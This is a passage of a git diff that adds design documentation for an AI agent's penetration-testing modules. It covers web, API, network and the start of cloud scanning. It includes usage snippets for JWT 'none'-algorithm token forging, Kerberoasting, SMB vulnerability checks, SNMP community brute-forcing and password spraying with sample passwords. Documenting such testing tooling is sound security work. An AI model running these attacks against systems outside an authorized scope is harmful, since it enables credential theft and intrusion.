failed, stopped +} +``` + +### ScanResult + +```typescript +{ + id: string + target: string + profile: ProfileId // quick, standard, thorough, passive, custom + crawlID?: string + tools: ToolExecution[] + findings: string[] // Finding IDs + stats: { + urlsScanned: number + toolsRun: number + toolsFailed: number + findingsCount: number + criticalCount: number + highCount: number + mediumCount: number + lowCount: number + infoCount: number + duration: number + } + startedAt: number + completedAt?: number + status: Status +} +``` + +--- + +## Scan Profiles + +| Profile | Crawl | Tools | Use Case | +|---------|-------|-------|----------| +| `quick` | depth=1, max=50 | whatweb, nikto | Fast initial assessment | +| `standard` | depth=2, max=200 | whatweb, nikto, gobuster, nuclei | Normal pentest | +| `thorough` | depth=3, max=500 | All web tools | Comprehensive scan | +| `passive` | none | whatweb, wafw00f | No active testing | +| `custom` | configurable | user-selected | Custom configuration | + +--- + +## Key Components + +### 1. WebCrawler (`crawler.ts`) + +- Uses native `fetch()` for HTTP requests +- Regex-based link extraction (no DOM library) +- Regex-based form extraction with input detection +- Respects robots.txt when enabled +- URL normalization and same-origin filtering +- Configurable depth, URL limits, and delays + +### 2. ScanOrchestrator (`orchestrator.ts`) + +- Executes crawl if profile.crawl.enabled +- Runs tools sequentially with error handling +- Parses tool output to generate findings +- Aggregates statistics across tools +- Publishes events for progress tracking + +### 3. ScanProfiles (`profiles.ts`) + +- Pre-defined profiles for common scenarios +- Custom profile creation with overrides +- Per-tool options configuration + +### 4. OwaspCategorization (`owasp.ts`) + +- Pattern-based categorization using regex and keywords +- Maps findings to OWASP Top 10 2021 categories +- Confidence scoring based on match count +- CVE presence automatically maps to A06 + +### 5. WebScanTool (`tool.ts`) + +- Agent-facing tool for web scanning operations +- Actions: crawl, scan, quick-scan, full-scan, urls, forms, status, owasp, profiles +- Scope validation via GovernanceScope +- Permission requests for network/tool access + +### 6. Parsers + +- **WPScanParser**: Parses WPScan JSON output for WordPress vulnerabilities +- **WhatWebParser**: Parses WhatWeb JSON/text output for technology fingerprinting + +--- + +## Events + +| Event | Description | +|-------|-------------| +| `pentest.webscan.crawl_started` | Crawl began | +| `pentest.webscan.url_discovered` | New URL found | +| `pentest.webscan.form_discovered` | New form found | +| `pentest.webscan.crawl_completed` | Crawl finished | +| `pentest.webscan.scan_started` | Scan began | +| `pentest.webscan.tool_started` | Tool execution started | +| `pentest.webscan.tool_completed` | Tool execution finished | +| `pentest.webscan.tool_failed` | Tool execution failed | +| `pentest.webscan.scan_completed` | Scan finished | + +--- + +## WebScanTool Actions + +| Action | Description | +|--------|-------------| +| `crawl` | Crawl a target URL to discover pages/forms | +| `scan` | Run scan with specific profile | +| `quick-scan` | Quick scan (alias for quick profile) | +| `full-scan` | Thorough scan (alias for thorough profile) | +| `urls` | List discovered URLs from a crawl | +| `forms` | List discovered forms from a crawl | +| `status` | Get status of running crawl/scan | +| `owasp` | Categorize findings by OWASP Top 10 | +| `profiles` | List available scan profiles | + +--- + +## OWASP Top 10 2021 Categorization + +| Category | Detection Patterns | +|----------|-------------------| +| A01:2021 Broken Access Control | path traversal, IDOR, privilege escalation, CORS | +| A02:2021 Cryptographic Failures | SSL/TLS, weak cipher, plaintext, HSTS | +| A03:2021 Injection | SQLi, XSS, command injection, XXE, SSTI | +| A04:2021 Insecure Design | business logic, rate limit, race condition | +| A05:2021 Security Misconfiguration | default creds, debug mode, headers, directory listing | +| A06:2021 Vulnerable Components | outdated software, CVEs, known vulnerabilities | +| A07:2021 Auth Failures | weak passwords, session, brute force, enumeration | +| A08:2021 Data Integrity Failures | deserialization, CI/CD, supply chain | +| A09:2021 Logging Failures | missing logs, log injection, audit | +| A10:2021 SSRF | server-side request forgery | + +--- + +## Files Created + +``` +packages/opencode/src/pentest/webscan/ +├── types.ts # 20+ Zod schemas +├── events.ts # 9 BusEvent definitions +├── crawler.ts # Web crawler +├── orchestrator.ts # Scan orchestration +├── profiles.ts # Profile definitions +├── storage.ts # Persistence +├── owasp.ts # OWASP categorization +├── tool.ts # WebScanTool +├── index.ts # Module exports +└── parsers/ + ├── index.ts # Parser exports + ├── wpscan.ts # WPScan parser + └── whatweb.ts # WhatWeb parser + +packages/opencode/test/pentest/ +└── webscan.test.ts # 35+ tests + +docs/ +└── PHASE8.md # This documentation +``` + +## Files Modified + +| File | Changes | +|------|---------| +| `src/pentest/index.ts` | Added webscan exports | +| `src/tool/registry.ts` | Registered WebScanTool | + +--- + +## Usage Examples + +### Crawl a Target + +``` +action="crawl" +target="http://example.com" +maxDepth=2 +maxUrls=100 +``` + +### Quick Scan + +``` +action="quick-scan" +target="http://example.com" +``` + +### Standard Scan + +``` +action="scan" +target="http://example.com" +profile="standard" +``` + +### Full Scan + +``` +action="full-scan" +target="http://example.com" +``` + +### Custom Scan + +``` +action="scan" +target="http://example.com" +profile="custom" +tools=["nikto", "nuclei", "gobuster"] +``` + +### List URLs from Crawl + +``` +action="urls" +crawlID="crawl_abc123" +limit=50 +``` + +### OWASP Categorization + +``` +action="owasp" +scanID="scan_xyz789" +``` + +### Programmatic Usage + +```typescript +import { WebCrawler, ScanOrchestrator, ScanProfiles, OwaspCategorization } from "./pentest/webscan" + +// Crawl a target +const crawlResult = await WebCrawler.crawl("http://example.com", { + maxDepth: 2, + maxUrls: 200, +}) + +// Run a scan with profile +const scanResult = await ScanOrchestrator.scan( + "http://example.com", + ScanProfiles.Standard, + { sessionID: "session_123" } +) + +// Categorize findings +const owasp = await OwaspCategorization.categorize(scanResult.id) +console.log(OwaspCategorization.format(owasp)) +``` + +--- + +## Storage Layout + +``` +pentest/webscan/ + crawls/ + crawl_abc123.json # Crawl results + scans/ + scan_xyz789.json # Scan results +``` + +--- + +## Crawler Implementation + +The crawler uses native `fetch()` with regex-based extraction: + +```typescript +// Link extraction +const HREF_REGEX = /href=["']([^"'#]+)["']/gi + +// Form extraction +const FORM_REGEX = /]*>([\s\S]*?)<\/form>/gi +const INPUT_REGEX = /]*>/gi +``` + +Key features: +- Same-origin URL filtering +- JavaScript/mailto/tel link filtering +- Configurable robots.txt respect +- Include/exclude URL patterns +- Request delay between fetches +- Timeout per request + +--- + +## Test Coverage + +**Test File:** `test/pentest/webscan.test.ts` + +**Test Categories:** + +| Category | Tests | +|----------|-------| +| WebCrawler.extractLinks | 3 tests - href, relative, skip js/mailto | +| WebCrawler.extractForms | 3 tests - inputs, file upload, textarea/select | +| ScanProfiles | 5 tests - profiles, configuration, custom | +| WebScanStorage | 6 tests - crawl/scan CRUD, filters | +| WPScanParser | 4 tests - JSON parsing, findings, format | +| WhatWebParser | 4 tests - JSON/text parsing, findings | +| OwaspCategorization | 8 tests - category detection | +| WebScanTypes | 3 tests - schema validation | + +--- + +## Dependencies + +- No external packages (uses native fetch) +- Uses existing: Storage, Bus, Findings, GovernanceScope, GovernanceMatcher +- CLI tools: nikto, gobuster, ffuf, nuclei, wpscan, whatweb, wafw00f (must be installed) + +--- + +## Future Enhancements + +1. **Additional Tools** + - sqlmap integration with form fuzzing + - dirb/dirbuster support + - skipfish integration + +2. **Crawler Improvements** + - JavaScript rendering (headless browser) + - API endpoint discovery + - GraphQL introspection + - WebSocket detection + +3. **Scan Features** + - Authenticated scanning + - Session handling + - Rate limiting + - Parallel tool execution + +4. **Reporting** + - OWASP-focused reports + - Executive summaries + - Remediation priorities + +--- + +## Related Documentation + +- [PHASE7.md](./PHASE7.md) - Exploit Framework Integration +- [PHASE6.md](./PHASE6.md) - Continuous Monitoring +- [PHASE5.md](./PHASE5.md) - Report Generation +- [PENTEST.md](./PENTEST.md) - Pentest module reference diff --git a/docs/PHASE09-api-security-scanner.md b/docs/PHASE09-api-security-scanner.md new file mode 100644 index 00000000000..720b22cbae6 --- /dev/null +++ b/docs/PHASE09-api-security-scanner.md @@ -0,0 +1,292 @@ +# Phase 9: API Security Scanner + +## Overview + +The API Security Scanner module (`pentest/apiscan`) provides comprehensive API security testing capabilities including: + +- **API Discovery**: Auto-detection and parsing of OpenAPI/Swagger and GraphQL specifications +- **Authentication Testing**: JWT analysis, API key validation, OAuth flow testing +- **Authorization Testing**: BOLA/IDOR detection, privilege escalation checks +- **Injection Testing**: SQL, NoSQL, and command injection testing +- **OWASP API Top 10 2023**: Categorization of findings by API-specific OWASP categories + +## Module Structure + +``` +src/pentest/apiscan/ +├── index.ts # Module exports +├── types.ts # Zod schemas (25+ types) +├── events.ts # BusEvent definitions (10 events) +├── storage.ts # API spec/scan persistence +├── profiles.ts # Scan profile definitions +├── tool.ts # ApiScanTool for agent +├── orchestrator.ts # Scan workflow coordination +├── discovery.ts # API endpoint discovery +├── auth/ +│ ├── index.ts # Auth module exports +│ ├── jwt.ts # JWT analysis (decode, validate, attack vectors) +│ ├── apikey.ts # API key testing +│ └── oauth.ts # OAuth flow testing +├── authz/ +│ ├── index.ts # Authz module exports +│ ├── bola.ts # BOLA/IDOR detection +│ └── privilege.ts # Privilege escalation testing +├── injection/ +│ ├── index.ts # Injection module exports +│ ├── sql.ts # SQL injection testing +│ ├── nosql.ts # NoSQL injection testing +│ └── command.ts # Command injection testing +└── parsers/ + ├── index.ts # Parser exports + ├── openapi.ts # OpenAPI/Swagger spec parser + └── graphql.ts # GraphQL introspection parser +``` + +## Usage + +### API Discovery + +```typescript +import { ApiDiscovery } from "./pentest/apiscan" + +// Discover API endpoints from target +const result = await ApiDiscovery.discover("https://api.example.com", { + parseOpenApi: true, + parseGraphQL: true, + commonPaths: true, +}) + +// Parse a specific OpenAPI spec +const spec = await ApiDiscovery.parseOpenApiSpec( + "https://api.example.com/openapi.json", + "https://api.example.com" +) +``` + +### JWT Analysis + +```typescript +import { JwtAnalyzer } from "./pentest/apiscan" + +const token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." +const analysis = JwtAnalyzer.analyze(token) + +console.log(analysis.algorithm) // "HS256" +console.log(analysis.isExpired) // false +console.log(analysis.issues) // ["WARNING: Using symmetric algorithm..."] +console.log(analysis.attackVectors) // ["None algorithm: Try setting alg to 'none'..."] + +// Format for display +console.log(JwtAnalyzer.format(analysis)) + +// Create test tokens +const noneToken = JwtAnalyzer.createNoneAlgToken(analysis) +``` + +### Running Scans + +```typescript +import { ApiScanOrchestrator, ApiScanProfiles } from "./pentest/apiscan" + +// Quick scan +const result = await ApiScanOrchestrator.scan("https://api.example.com", { + profile: "quick", +}) + +// Scan with authentication +const result = await ApiScanOrchestrator.scan("https://api.example.com", { + profile: "standard", + auth: { + type: "jwt", + token: "eyJ...", + }, +}) + +// Custom profile +const customProfile = ApiScanProfiles.createCustom("standard", { + injectionTests: { enabled: true, sql: true, nosql: false, command: false }, + bolaTests: true, +}) +``` + +### Tool Actions + +The `apiscan` tool supports the following actions: + +| Action | Description | +|--------|-------------| +| `discover` | Discover API endpoints from target | +| `parse-spec` | Parse OpenAPI/Swagger specification | +| `parse-graphql` | Parse GraphQL introspection | +| `scan` | Run scan with specific profile | +| `quick-scan` | Quick scan (alias for quick profile) | +| `full-scan` | Thorough scan (alias for thorough profile) | +| `endpoints` | List discovered API endpoints | +| `jwt-analyze` | Analyze a JWT token for vulnerabilities | +| `auth-test` | Test authentication mechanisms | +| `bola-test` | Test for BOLA/IDOR vulnerabilities | +| `inject-test` | Test for injection vulnerabilities | +| `status` | Get status of running scan | +| `owasp-api` | Categorize findings by OWASP API Top 10 | + +## Scan Profiles + +| Profile | Discovery | Auth Tests | Injection | BOLA | Use Case | +|---------|-----------|------------|-----------|------|----------| +| `discovery` | full | none | none | no | Map API surface | +| `quick` | basic | jwt-decode | none | no | Fast assessment | +| `standard` | full | all auth | sql, nosql | yes | Normal pentest | +| `thorough` | full | all + fuzzing | all injection | yes | Comprehensive | +| `passive` | spec-only | jwt-decode | none | no | No active testing | +| `auth-focused` | basic | all + brute | none | yes | Auth-specific testing | +| `custom` | configurable | configurable | configurable | configurable | Custom configuration | + +## OWASP API Top 10 2023 Categories + +The scanner categorizes findings according to the OWASP API Security Top 10 2023: + +| Category | Detection Patterns | +|----------|-------------------| +| API1:2023 Broken Object Level Authorization | BOLA, IDOR, horizontal privilege | +| API2:2023 Broken Authentication | JWT issues, weak auth, session problems | +| API3:2023 Broken Object Property Level Authorization | Mass assignment, excessive data exposure | +| API4:2023 Unrestricted Resource Consumption | Rate limiting issues, DoS vectors | +| API5:2023 Broken Function Level Authorization | Vertical privilege escalation | +| API6:2023 Unrestricted Access to Sensitive Business Flows | Business logic bypass | +| API7:2023 Server Side Request Forgery | SSRF via API parameters | +| API8:2023 Security Misconfiguration | CORS, headers, verbose errors | +| API9:2023 Improper Inventory Management | Undocumented endpoints, old API versions | +| API10:2023 Unsafe Consumption of APIs | Third-party API trust issues | + +## Events + +The module emits the following events: + +| Event | Description | +|-------|-------------| +| `pentest.apiscan.discovery_started` | API discovery began | +| `pentest.apiscan.endpoint_discovered` | New endpoint found | +| `pentest.apiscan.spec_parsed` | OpenAPI/GraphQL spec parsed | +| `pentest.apiscan.scan_started` | Scan began | +| `pentest.apiscan.endpoint_tested` | Endpoint test completed | +| `pentest.apiscan.auth_tested` | Auth test completed | +| `pentest.apiscan.injection_tested` | Injection test completed | +| `pentest.apiscan.vulnerability_found` | Vulnerability discovered | +| `pentest.apiscan.scan_completed` | Scan finished | +| `pentest.apiscan.scan_failed` | Scan failed | + +## Storage + +API specifications and scan results are persisted in: + +``` +pentest/apiscan/ + specs/ + spec_abc123.json # Parsed API specs + scans/ + apiscan_xyz789.json # Scan results +``` + +## Data Types + +### ApiEndpoint + +```typescript +{ + id: string + path: string // /api/users/{id} + method: HttpMethod // GET, POST, PUT, DELETE, PATCH + summary?: string + description?: string + operationId?: string + parameters: ApiParameter[] + requestBody?: RequestBody + responses: ResponseSchema[] + security?: SecurityRequirement[] + tags?: string[] + deprecated?: boolean +} +``` + +### ApiSpec + +```typescript +{ + id: string + target: string // Base URL + type: "openapi" | "graphql" | "manual" + version?: string // OpenAPI version + title?: string + description?: string + endpoints: ApiEndpoint[] + securitySchemes: SecurityScheme[] + graphqlSchema?: GraphQLSchema + servers?: string[] + discoveredAt: number +} +``` + +### JwtAnalysis + +```typescript +{ + raw: string + header: Record + payload: Record + signature: string + algorithm: string + isExpired: boolean + expiresAt?: number + issuedAt?: number + issuer?: string + subject?: string + audience?: string | string[] + issues: string[] // Security issues found + attackVectors: string[] // Suggested attack vectors +} +``` + +### ApiScanResult + +```typescript +{ + id: string + target: string + specId?: string + profile: ProfileId + auth?: AuthConfig + endpoints: EndpointTestResult[] + jwtAnalysis?: JwtAnalysis + bolaResults?: BolaTestResult[] + injectionResults?: InjectionTestResult[] + findings: string[] // Finding IDs + stats: ScanStats + startedAt: number + completedAt?: number + status: Status + error?: string +} +``` + +## Testing + +Run the apiscan tests with: + +```bash +bun test test/pentest/apiscan.test.ts +``` + +The test suite covers: +- JWT decoding and analysis +- OpenAPI 2.0 and 3.x parsing +- GraphQL introspection parsing +- Profile configurations +- Storage operations +- Type validation + +## Dependencies + +The module uses: +- No external packages (uses native fetch, base64 decode) +- Existing modules: Storage, Bus, Findings, GovernanceScope +- Patterns from: webscan module (Tool.define, storage, events) diff --git a/docs/PHASE10-network-infrastructure.md b/docs/PHASE10-network-infrastructure.md new file mode 100644 index 00000000000..61cd2b5282f --- /dev/null +++ b/docs/PHASE10-network-infrastructure.md @@ -0,0 +1,527 @@ +# Phase 10: Network Infrastructure Scanner + +## Overview + +The Network Infrastructure Scanner module (`pentest/netscan`) provides comprehensive network infrastructure security testing capabilities including: + +- **Active Directory**: Domain enumeration, user/group/computer discovery, Kerberoasting, AS-REP roasting, trust enumeration +- **SMB**: Share enumeration, null session testing, SMB signing checks, vulnerability detection (EternalBlue, SMBGhost, PrintNightmare) +- **SNMP**: Community string brute-forcing, SNMP walking, write access testing +- **DNS**: Zone transfer attempts, subdomain enumeration, cache poisoning checks +- **LDAP**: Anonymous bind testing, enumeration, password policy extraction +- **Credentials**: Default credential testing, password spraying with lockout awareness + +## Module Structure + +``` +src/pentest/netscan/ +├── index.ts # Module exports +├── types.ts # Zod schemas (30+ types) +├── events.ts # BusEvent definitions (20+ events) +├── storage.ts # Scan/host/credential persistence +├── profiles.ts # Scan profile definitions +├── tool.ts # NetScanTool for agent +├── orchestrator.ts # Scan workflow coordination +├── parsers/ +│ ├── index.ts # Parser exports +│ ├── crackmapexec.ts # CrackMapExec output parser +│ ├── enum4linux.ts # Enum4linux-ng output parser +│ └── ldapsearch.ts # LDIF/ldapsearch output parser +├── smb/ +│ ├── index.ts # SMB module exports +│ ├── shares.ts # Share enumeration +│ ├── sessions.ts # Null/guest session testing +│ ├── signing.ts # SMB signing checks +│ └── vulns.ts # SMB vulnerability detection +├── dns/ +│ ├── index.ts # DNS module exports +│ ├── zone.ts # Zone transfer testing +│ ├── enum.ts # Subdomain enumeration +│ └── cache.ts # Cache poisoning checks +├── snmp/ +│ ├── index.ts # SNMP module exports +│ ├── community.ts # Community string testing +│ ├── walk.ts # SNMP tree walking +│ └── write.ts # SNMP write access testing +├── ldap/ +│ ├── index.ts # LDAP module exports +│ ├── bind.ts # Anonymous/authenticated bind +│ ├── enum.ts # LDAP enumeration +│ └── policy.ts # Password policy extraction +├── ad/ +│ ├── index.ts # AD module exports +│ ├── enumeration.ts # Domain enumeration +│ ├── kerberos.ts # Kerberoast/AS-REP roast +│ └── trusts.ts # Domain trust enumeration +└── creds/ + ├── index.ts # Credential module exports + ├── defaults.ts # Default credential database + └── spray.ts # Password spraying +``` + +## Usage + +### Active Directory Enumeration + +```typescript +import { ADEnumeration, Kerberos, DomainTrusts } from "./pentest/netscan" + +// Full AD enumeration +const result = await ADEnumeration.enumerate({ + dc: "192.168.1.10", + domain: "corp.local", + auth: { username: "user", password: "pass" }, +}) + +console.log(ADEnumeration.formatResults(result)) + +// Get specific objects +const users = await ADEnumeration.getUsers("192.168.1.10", { + username: "user", + password: "pass", + domain: "corp.local", +}) + +const groups = await ADEnumeration.getGroups("192.168.1.10", auth) +const computers = await ADEnumeration.getComputers("192.168.1.10", auth) + +// Find Kerberoastable accounts +const kerbResult = await Kerberos.findTargets({ + dc: "192.168.1.10", + domain: "corp.local", + auth: { username: "user", password: "pass" }, +}) + +console.log(`Kerberoastable: ${kerbResult.kerberoastTargets.length}`) +console.log(`AS-REP roastable: ${kerbResult.asrepTargets.length}`) + +// Enumerate domain trusts +const trusts = await DomainTrusts.enumerate({ + dc: "192.168.1.10", + domain: "corp.local", + auth: { username: "user", password: "pass" }, +}) +``` + +### SMB Testing + +```typescript +import { SMBShares, SMBSessions, SMBSigning, SMBVulns } from "./pentest/netscan" + +// Enumerate shares +const shares = await SMBShares.enumerate("192.168.1.10", { + auth: { username: "user", password: "pass" }, + checkAccess: true, +}) + +// Test null session +const nullResult = await SMBSessions.testNullSession("192.168.1.10") +console.log(`Null session allowed: ${nullResult.allowed}`) + +// Check SMB signing +const signing = await SMBSigning.check("192.168.1.10") +console.log(`SMB signing required: ${signing.required}`) + +// Check for vulnerabilities +const vulns = await SMBVulns.check("192.168.1.10", { + checks: ["ms17-010", "cve-2020-0796", "printnightmare"], +}) +``` + +### DNS Testing + +```typescript +import { DNSZone, DNSEnum } from "./pentest/netscan" + +// Attempt zone transfer +const zoneResult = await DNSZone.attemptTransfer("example.com", { + nameservers: ["ns1.example.com", "ns2.example.com"], +}) + +if (zoneResult.success) { + console.log(`Zone transfer successful! ${zoneResult.records.length} records`) +} + +// Subdomain enumeration +const subdomains = await DNSEnum.enumerate("example.com", { + bruteForce: true, + wordlist: ["www", "mail", "ftp", "dev", "staging"], +}) +``` + +### SNMP Testing + +```typescript +import { SNMPCommunity, SNMPWalk } from "./pentest/netscan" + +// Brute-force community strings +const bruteResult = await SNMPCommunity.bruteForce("192.168.1.1", { + communities: ["public", "private", "cisco", "secret"], +}) + +// SNMP walk with found community +if (bruteResult.validCommunities.length > 0) { + const walkResult = await SNMPWalk.walk("192.168.1.1", { + community: bruteResult.validCommunities[0], + }) +} +``` + +### LDAP Testing + +```typescript +import { LDAPBind, LDAPEnum, LDAPPolicy } from "./pentest/netscan" + +// Test anonymous bind +const bindResult = await LDAPBind.testAnonymous("192.168.1.10") +console.log(`Anonymous bind: ${bindResult.anonymous}`) + +// Enumerate LDAP +const ldapResult = await LDAPEnum.enumerate("192.168.1.10", { + baseDN: "DC=corp,DC=local", + auth: { username: "user", password: "pass" }, +}) + +// Extract password policy +const policy = await LDAPPolicy.extract("192.168.1.10", { + baseDN: "DC=corp,DC=local", +}) + +console.log(`Min password length: ${policy.minLength}`) +console.log(`Lockout threshold: ${policy.lockoutThreshold}`) +``` + +### Credential Testing + +```typescript +import { DefaultCreds, PasswordSpray } from "./pentest/netscan" + +// Test default credentials +const credResults = await DefaultCreds.test("192.168.1.10", "ssh", 22) + +// Password spray with lockout awareness +const sprayResult = await PasswordSpray.spray( + { host: "192.168.1.10", port: 445, service: "smb", domain: "CORP" }, + ["admin", "user1", "user2"], + ["Password1", "Welcome1", "Summer2024"], + { + delayBetweenPasswords: 30000, // 30 seconds between passwords + lockoutThreshold: 5, // Stop before lockout + observationWindow: 30, // Lockout window in minutes + } +) + +console.log(`Valid credentials: ${sprayResult.valid.length}`) +console.log(`Locked accounts: ${sprayResult.locked.length}`) +``` + +### Running Full Scans + +```typescript +import { NetScanOrchestrator, NetScanProfiles } from "./pentest/netscan" + +// Quick scan +const result = await NetScanOrchestrator.scan("192.168.1.0/24", { + profile: "quick", +}) + +// Full scan with authentication +const result = await NetScanOrchestrator.scan("192.168.1.0/24", { + profile: "thorough", + auth: { username: "user", password: "pass", domain: "CORP" }, +}) + +// AD-focused scan +const result = await NetScanOrchestrator.scan("192.168.1.10", { + profile: "ad-focused", + auth: { username: "user", password: "pass", domain: "CORP" }, +}) + +// Get scan status +const status = await NetScanOrchestrator.getStatus(result.id) +``` + +### Tool Actions + +The `netscan` tool supports the following actions: + +| Action | Description | +|--------|-------------| +| `discover` | Discover network hosts and services | +| `scan` | Run full scan with specified profile | +| `ad-enum` | Enumerate Active Directory domain | +| `ad-users` | List domain users | +| `ad-groups` | List domain groups | +| `ad-computers` | List domain computers | +| `ad-kerberoast` | Find Kerberoastable accounts | +| `ad-asrep` | Find AS-REP roastable accounts | +| `smb-shares` | Enumerate SMB shares | +| `smb-null` | Test null session access | +| `smb-signing` | Check SMB signing configuration | +| `smb-vulns` | Check for SMB vulnerabilities | +| `snmp-walk` | SNMP walk with community string | +| `snmp-brute` | Brute-force SNMP community strings | +| `dns-zone` | Attempt DNS zone transfer | +| `dns-enum` | Enumerate subdomains | +| `ldap-enum` | LDAP enumeration | +| `ldap-policy` | Extract password policy | +| `creds-default` | Test default credentials | +| `creds-spray` | Password spraying attack | +| `status` | Get scan status | +| `profiles` | List available scan profiles | + +## Scan Profiles + +| Profile | SMB | AD | SNMP | DNS | LDAP | Creds | Use Case | +|---------|-----|----|----- |-----|------|-------|----------| +| `discovery` | no | no | no | no | no | no | Host discovery only | +| `quick` | yes | no | no | no | yes | no | Fast assessment | +| `standard` | yes | yes | no | yes | yes | no | Normal pentest | +| `thorough` | yes | yes | yes | yes | yes | yes | Comprehensive | +| `stealth` | yes | no | no | no | yes | no | Low and slow | +| `ad-focused` | yes | yes | no | no | yes | no | AD-specific testing | +| `custom` | configurable | configurable | configurable | configurable | configurable | configurable | Custom configuration | + +## Vulnerability Checks + +### SMB Vulnerabilities + +| Vulnerability | CVE | Description | +|---------------|-----|-------------| +| EternalBlue | MS17-010 | Remote code execution in SMBv1 | +| SMBGhost | CVE-2020-0796 | Buffer overflow in SMBv3 compression | +| PrintNightmare | CVE-2021-34527 | Print Spooler RCE | +| PetitPotam | - | NTLM relay via MS-EFSRPC | + +### Kerberos Attacks + +| Attack | Target | Detection | +|--------|--------|-----------| +| Kerberoasting | Service accounts with SPNs | servicePrincipalName attribute | +| AS-REP Roasting | Accounts without preauth | userAccountControl DONT_REQUIRE_PREAUTH | + +## Events + +The module emits the following events: + +| Event | Description | +|-------|-------------| +| `pentest.netscan.scan_started` | Network scan began | +| `pentest.netscan.scan_completed` | Scan finished | +| `pentest.netscan.scan_failed` | Scan failed | +| `pentest.netscan.host_discovered` | New host found | +| `pentest.netscan.service_discovered` | Service detected | +| `pentest.netscan.ad_domain_found` | AD domain discovered | +| `pentest.netscan.ad_user_found` | Domain user enumerated | +| `pentest.netscan.ad_group_found` | Domain group enumerated | +| `pentest.netscan.kerberoast_target` | Kerberoastable account found | +| `pentest.netscan.asrep_target` | AS-REP roastable account found | +| `pentest.netscan.smb_share_found` | SMB share discovered | +| `pentest.netscan.null_session` | Null session allowed | +| `pentest.netscan.signing_disabled` | SMB signing not required | +| `pentest.netscan.vulnerability_found` | Vulnerability detected | +| `pentest.netscan.credential_found` | Valid credential discovered | +| `pentest.netscan.snmp_community_found` | Valid SNMP community string | +| `pentest.netscan.zone_transfer` | DNS zone transfer succeeded | +| `pentest.netscan.subdomain_found` | Subdomain discovered | +| `pentest.netscan.ldap_anonymous` | Anonymous LDAP bind allowed | +| `pentest.netscan.policy_weakness` | Password policy weakness | + +## Storage + +Network scan data is persisted in: + +``` +pentest/netscan/ + scans/ + netscan_abc123.json # Scan results + hosts/ + host_xyz789.json # Discovered hosts + credentials/ + cred_def456.enc # Encrypted credentials +``` + +Credentials are encrypted with AES-256-CBC before storage. + +## Data Types + +### DiscoveredHost + +```typescript +{ + id: string + ip: string + hostname?: string + mac?: string + os?: string + osVersion?: string + services: Service[] + domain?: string + isDomainController?: boolean + discoveredAt: number +} +``` + +### Service + +```typescript +{ + port: number + protocol: "tcp" | "udp" + service: string + version?: string + product?: string + extraInfo?: string +} +``` + +### ADUser + +```typescript +{ + dn: string + samAccountName: string + userPrincipalName?: string + displayName?: string + description?: string + enabled: boolean + adminCount: boolean + memberOf: string[] + servicePrincipalNames: string[] + dontRequirePreauth: boolean + lastLogon?: number + passwordLastSet?: number +} +``` + +### SMBShare + +```typescript +{ + name: string + type: "DISK" | "IPC" | "PRINT" | "DEVICE" + remark?: string + permissions: { + read: boolean + write: boolean + anonymous: boolean + } + sensitiveFiles?: string[] +} +``` + +### CredentialResult + +```typescript +{ + id: string + host: string + service: string + port: number + username: string + password?: string + hash?: string + method: "default" | "spray" | "brute" | "dump" + valid: boolean + admin: boolean + timestamp: number +} +``` + +### NetScanResult + +```typescript +{ + id: string + target: string + profile: ProfileId + status: "pending" | "running" | "completed" | "failed" + stats: { + hostsScanned: number + servicesFound: number + vulnerabilitiesFound: number + credentialsFound: number + } + findings: string[] + startedAt: number + completedAt?: number + error?: string +} +``` + +## External Tool Parsers + +The module includes parsers for common penetration testing tools: + +### CrackMapExec + +```typescript +import { CrackMapExecParser } from "./pentest/netscan" + +const output = `SMB 192.168.1.10 445 DC01 [+] CORP\\admin:Password123 (Pwn3d!)` +const results = CrackMapExecParser.parse(output) + +console.log(results.credentials) // Valid credentials found +console.log(results.shares) // Enumerated shares +console.log(results.hosts) // Host information +``` + +### Enum4linux + +```typescript +import { Enum4linuxParser } from "./pentest/netscan" + +const output = await runEnum4linux("192.168.1.10") +const results = Enum4linuxParser.parse(output) + +console.log(results.users) // Enumerated users +console.log(results.groups) // Enumerated groups +console.log(results.shares) // Enumerated shares +console.log(results.passwordPolicy) // Password policy +``` + +### Ldapsearch + +```typescript +import { LdapsearchParser } from "./pentest/netscan" + +const ldif = await runLdapsearch(...) +const results = LdapsearchParser.parse(ldif) + +console.log(results.entries) // LDAP entries +const users = LdapsearchParser.extractUsers(results) +``` + +## Testing + +Run the netscan tests with: + +```bash +bun test test/pentest/netscan.test.ts +``` + +The test suite covers: +- CrackMapExec output parsing +- Enum4linux output parsing +- LDIF/ldapsearch parsing +- Profile configurations +- Storage operations +- Type validation +- Password spray utilities + +## Dependencies + +The module uses external tools: +- `smbclient` - SMB share enumeration +- `rpcclient` - RPC enumeration +- `ldapsearch` - LDAP queries +- `dig`/`host` - DNS queries +- `snmpwalk`/`snmpget` - SNMP operations +- `nmap` - Service discovery +- `sshpass` - SSH credential testing +- `xfreerdp` - RDP credential testing +- `crackmapexec` - Multi-protocol testing + +Existing modules used: +- Storage, Bus, Findings, GovernanceScope +- Patterns from: apiscan module (Tool.define, storage, events) diff --git a/docs/PHASE11-cloud-security.md b/docs/PHASE11-cloud-security.md new file mode 100644 index 00000000000..1a446ba8e99 --- /dev/null +++ b/docs/PHASE11-cloud-security.md @@ -0,0 +1,689 @@ +# Phase 11: Cloud Security Scanner + +## Overview + +The Cloud Security Scanner module (`pentest/cloudscan`) provides comprehensive cloud infrastructure security testing capabilities across major cloud providers: + +- **AWS**: IAM analysis, S3 bucket security, Security Groups, EC2 instances, Lambda functions +- **Azure**: RBAC analysis, Storage accounts, Network Security Groups, VMs, Function Apps +- **GCP**: IAM/Service accounts, Cloud Storage, Firewall rules, GCE instances, Cloud Functions +- **Compliance**: CIS Benchmarks, NIST, PCI-DSS, HIPAA, SOC2, GDPR, ISO27001 +- **External Tools**: Prowler, ScoutSuite integration + +## Module Structure + +``` +src/pentest/cloudscan/ +├── index.ts # Module exports +├── types.ts # Zod schemas (40+ types) +├── events.ts # BusEvent definitions (25+ events) +├── storage.ts # Scan persistence +├── profiles.ts # Scan profile definitions +├── tool.ts # CloudScanTool for agent +├── orchestrator.ts # Scan workflow coordination +├── discovery.ts # Cloud resource enumeration +├── compliance.ts # Compliance framework checker +├── parsers/ +│ ├── index.ts # Parser exports +│ ├── aws-cli.ts # AWS CLI JSON parser +│ ├── azure-cli.ts # Azure CLI JSON parser +│ ├── gcloud.ts # gcloud CLI JSON parser +│ ├── prowler.ts # Prowler output parser +│ └── scoutsuite.ts # ScoutSuite output parser +├── aws/ +│ ├── index.ts # AWS module exports +│ ├── iam.ts # IAM enumeration & analysis +│ ├── s3.ts # S3 bucket security +│ ├── security-groups.ts # Security group 